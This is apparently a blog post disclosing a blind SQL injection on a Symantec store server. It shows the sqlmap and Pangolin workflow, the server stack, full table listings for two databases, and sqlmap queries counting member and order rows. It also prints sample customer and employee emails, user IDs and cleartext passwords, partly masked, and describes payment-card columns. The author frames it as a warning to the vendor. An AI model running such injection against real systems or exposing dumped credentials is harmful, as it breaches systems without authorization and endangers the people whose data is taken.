Symantec exposed passwords,serials… SQL Injection, full database access
“Symantec was founded in 1982 by visionary computer scientists. The company has evolved to become one of the world’s largest software companies with more than 17,500 employees in more than 40 countries.Symantec helps consumers and organizations secure and manage their information-driven world. Our software and services protect against more risks at more points, more completely and efficiently, enabling confidence wherever information is used or stored.”
We can read on their site … Interesting …. Especially in light of the finds. A secured bad parameter allows full access to Symantec servers, allows access to many sensitive data stored on this server. So, it seems quite strange how a company like Symantec, which sells software and security solutions, the famous Norton for example, wants to protect ourselves. Instead, it is not able to protect its own database. Let’s see what actually is.
Blind SQL Injection is not as spectacular as a normal SQL injection, as the error (the result of injection) does not appear on the website. It is based on the concept of true and false. When “i put a question” real server (and 1 = 1 in our case), we will answer truly, that page is loading properly.
And when “asking” something untrue (and 1 = 2) web page no longer load.
Therefore, to show vulnerability will use 2 tools, Pangolin and sqlmap.
We find that:
web server operating system: Windows 2003 or 2000
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
In the first picture appears information about the server. The worst thing is highlighted in red on me in the picture, we have access to drivers (C: \ and D: \), that WE CAN WALK ON THE SERVER AS IN YOUR PC.
In these two pictures we see available databases that have access:
It is clear that we are on Symantec server. Oasis, Northwind, OneCare, etc are important projects Symantec. But they seemed to me particularly interesting 2 databases, highlighted in red in the picture, one related to Norton and Symantecstore.
Nortonplus database is huge, contains 91 tables. I will enumerate, without further details.
Database: nortonplus
[91 tables]
+——————-
| AccessLogs
| bak_counsel_071111
| bak_counsel_080424
| dtproperties
| sysconstraints
| syssegments
| T_pcList
| T_pcList_nor
| tb_account_sym
| TB_BILLCLOSE_LOG
| TB_Charge
| TB_CIRCULATION
| TB_CODE
| TB_CONFIRM_LOG
| TB_COUNSEL
| TB_COUNSEL_CLAIM
| TB_COUNSEL_LOG
| TB_COUNSEL_STOP
| TB_COUNSEL_TECHNICAL
| TB_DEFENSE
| TB_DEFENSE_LOG
| TB_DEPARTMENT
| TB_EMPLOYEE
| TB_Event
| TB_Faq
| TB_FUNCTION_CODE
| TB_FUNCTION_ID
| TB_GENERAL_CLAIM
| TB_GENERAL_CLAIM_LOG
| TB_Group
| TB_groupMenu
| TB_HANAFOS_EVENT
| TB_HANAFOS_SYNC
| TB_mailBoard
| TB_MEMBER
| TB_Menu
| TB_MODIFY_EXPIRATION_DATE
| TB_myClip
| TB_nortonHelp
| TB_nortonHelp_Cmt
| TB_Notice
| TB_OFFLINE
| TB_OFFLINE_LOG
| TB_pcBreakDown
| TB_pcBreakDown_Cmt
| TB_Pds
| TB_PERFORMANCE
| TB_PIN_CANCEL
| TB_Praise
| TB_Qna
| TB_reCom
| TB_REFUND
| TB_REFUND_LOG
| TB_RESERVE
| TB_RESERVE_TIME
| TB_RETENTION
| TB_secInfo
| TB_secNews
| TB_secReport
| TB_secure_free
| TB_secure_free_comment
| TB_SMS_LOG
| TB_SMS_LOG_MB
| TB_STOCKED_PIN
| TB_TIMECARD
| TB_TIMECARD_LOG
| TB_VENDER
| tmp_counsel
| tmp_monthday
| v_accounts
| V_CLAIM_MEMBER
| V_DEFENSE_LIST1
| V_GENERAL_CLAIM_LIST
| V_LOCK
| V_MEM_ALL
| V_MEM_ALLLIST
| V_MEM_CLAIM
| V_MEM_LIST
| V_MEM_LIST2
| V_MEM_LIST3
| V_MY_ANSWER
| V_MY_CLIP
| V_MY_HELP_Break_Cmt
| V_MY_HELP_BreakDown
| V_MY_QUEST
| V_OFFLINE_LIST
| V_PERFORMANCE
| V_REFUND_LIST
| V_RETENTION_LIST
| ZIPCODE
| zipcode1
+———————
Instead I will insist more on Symantecstore database, especially for a database shop should be protected. The database contains 56 tables.
Database: symantecstore
[56 tables]
+—————————
| AddressInfo
| CatalogKey
| CategoryKey
| dtproperties
| ExtendedAttributesInfo
| ExtendedAttributesInfoArray
| JapanTelnet
| LineItemDigitalInfo
| LineItemDigitalInfoArray
| LineItemInfo
| LineItemInfoArray
| LineItemPriceInfo
| LineItemTaxListInfo
| OrderInfo
| OrderPriceInfo
| PaymentInformationArray
| PaymentInformationInfo
| PCDoctorTelnet
| ProductDataInfo
| ProductKey
| SiteInfo
| sysconstraints
| syssegments
| TB_CASEID
| TB_COMPANY2
| TB_Complete_seq
| TB_COUNSEL
| TB_COUNSEL2
| TB_COUNSEL_LOG
| TB_CRM_REPORT
| TB_CRM_REPORT_CODE
| TB_CsDetail
| TB_CSTYPE
| TB_EMAIL_SEND
| TB_EMPLOYEE
| TB_EXCEL_TEST
| TB_FTP_UPLOAD
| TB_FTP_UPLOAD_LOG
| TB_INCENTIVE
| TB_MEMBER
| TB_NOTICE
| TB_NUM_INCENTIVE
| TB_OOS_LOG
| TB_ORDER
| TB_ORDER_INFO
| TB_ORDER_LOG
| TB_PRODUCT
| TB_QNA
| TB_QNA1
| TB_VERSION
| TB_WORRIMENT
| UserInfo
| UserKey
| V_MEM_LIST
| V_MEM_LIST1
| ZIPCODE
+———————–
One of the tables is TB_MEMBER, which contains 70,356 rows, the data members (for help “I called the tool’s sqlmap)
[16:27:41] [INFO] fetching number of columns ‘M_EMAIL, M_NAME, M_PASS, M_USERID’
entries for table ‘TB_MEMBER’ on database ’symantecstore’
[16:27:41] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000
)), CHAR(32)) FROM symantecstore..TB_MEMBER
[16:27:41] [INFO] retrieved: 70356
We randomly selected 6 users, from number 100 to 105, in the table. I was outraged when I saw the result shown by sqlmap. These users passwords are stored in CLEAR TEXT !!!!!!!. (To protect users of those data, we replaced some letters with X’s)
Database: symantecstore
Table: TB_MEMBER
[6 entries]
+———————————+————-+————-
| M_EMAIL | M_NAME | M_PASS | M_USERID |
+———————————-+————+————–
| khj_XX@hotmail.com | XXXX | shsaraXXX| mysandy |
| kyh1XXX@hanmail.net | XXX | kyh1XXX | kyh1658 |
| gyuXXX@hanmail.net | XXX | s062XXX | gyum96 |
| tjhwaXX@hotmail.com | XXX | 60XXX | tjhwang |
| dyb2XXX@hotmail.com | XXX | doXXX | dyb2012 |
| yosugi10XX@hotmail.com | XXXX | ys5XXX | yosugi |
Similarly, in CLEAR TEXT, passwords are saved and the 134 employees of TB_EMPLOYEE table.
Database: symantecstore
Table: TB_EMPLOYEE
[6 entries]
+———–+———–+——————+
| E_ID | E_NAME | E_PASSWORD |
+———-+————+————+
| sysedit2 | XXX | s76083XXX |
| zany | XXX | asdXXX |
| zany1 | XXX | hm12XXX |
| s0167 | XXX | hm12XXX |
| s0166 | XXX | hm12XXX |
| s0191 | XXX | hm12XXX |
Is about one one shop, I was curious what the table contains PaymentInformationInfo. Table columns will show no other details
Database: symantecstore
Table: PaymentInformationInfo
[20 columns]
+———————
| Column
+———————
| AuthorizationID
| BillingAddress
| CardExpirationMonth
| CardExpirationYear
| CardNumber
| CardType
| CcIssueCode
| CcIssueMonth
| CcIssueYear
| CustomerEmail
| CustomerFirstName
| CustomerLastName
| CustomerPO
| OrderID
| PaymentAmount
| PaymentMethodName
| PaymentType
| RoutingNumber
| SecurityIndicator
| VatNumber
+——————-
TB_ORDER table columns are:
Database: symantecstore
Table: TB_ORDER
[12 columns]
+—————
| Column
+—————
| AreaCode
| Locale
| OrderDate
| OrderNum
| Platform
| ProductName
| ProductNumber
| Qty
| S_SEQ
| SaleAmount
| SerialNumber
| sku
+—————
And when we put sqlmap’s tool to work, there is little surprise us to find that this table contain 122,152 of Serial Number.
[16:39:22] [INFO] fetching number of columns ‘ProductName, ProductNumber, Serial
Number’ entries for table ‘TB_ORDER’ on database ’symantecstore’
[16:39:22] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000
)), CHAR(32)) FROM symantecstore..TB_ORDER
[16:39:22] [INFO] retrieved: 122152
If you remember, in February, Kaspersky faced with a sql injection. Then they had the courage to admit vulnerability, why have my admiration. There was fair play, they quickly secured vulnerable parameter, and even if at first they were very angry at me, finally understood that I did not extract, I saved nothing, I have not abused in any way by the data found. My goal was, what is still, to warn. To call attention.
That being said, expect the curious reaction from Symantec.
Source: http://unu123456.baywords.com